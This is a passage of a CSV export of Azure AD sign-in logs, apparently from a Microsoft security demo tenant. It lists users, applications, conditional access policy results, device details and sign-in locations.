'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c0ce23b7-81fe-4875-94a5-4bf3483e1a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c0ce23b7-81fe-4875-94a5-4bf3483e1a00,SigninLogs,Sucess,50.6406517,5.572050095
+373,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:40.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fb4a9b3e-f556-431c-9d15-aa35c40c89df,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'IE 7.0'}",6052c246-a70b-451d-9677-f5a730711800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6052c246-a70b-451d-9677-f5a730711800,SigninLogs,Sucess,35.01296997,-80.93171692
+374,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:05.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,549b402c-ba63-4266-b599-2baf7b0cc54b,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",0a70c0cd-a111-442a-87bb-4de8140a1b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,0a70c0cd-a111-442a-87bb-4de8140a1b00,SigninLogs,Sucess,33.7984581,-84.38828278
+375,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:48.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0124ed77-1d94-441f-8e25-07f734a5aaed,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 16:18,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",eee646e6-0206-4fee-b727-77b6d1684b00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,eee646e6-0206-4fee-b727-77b6d1684b00,SigninLogs,Sucess,32.32146072,34.85319901
+376,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:24.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e35c6f56-d6f8-420f-b808-234ade6ab6cf,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",818ddda4-c0b9-4b32-b709-e1177d631900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,818ddda4-c0b9-4b32-b709-e1177d631900,SigninLogs,Sucess,36.6404686,-78.26995087
+377,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:50.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c771ca39-07ac-4ee5-8316-480ede22a678,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:16,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",b99c73a2-3a55-4cd2-b316-bff8f4411e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,b99c73a2-3a55-4cd2-b316-bff8f4411e00,SigninLogs,Sucess,38.47222137,-77.41989899
+378,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:30.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e9f7e9db-3f0b-40ca-9a83-da6cf4414a1e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",40382d0f-2d62-488b-977e-6606e6131700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,40382d0f-2d62-488b-977e-6606e6131700,SigninLogs,Sucess,36.6404686,-78.26995087
+379,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:28.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b4a3a477-e5de-4fbc-94dd-50005c67575a,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:10,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",23877b62-2023-4ce4-9fb4-bf6580e61500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,23877b62-2023-4ce4-9fb4-bf6580e61500,SigninLogs,Sucess,35.01296997,-80.93171692
+380,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:29.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,86c6f616-dea4-4d7a-b157-5415c9958718,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': 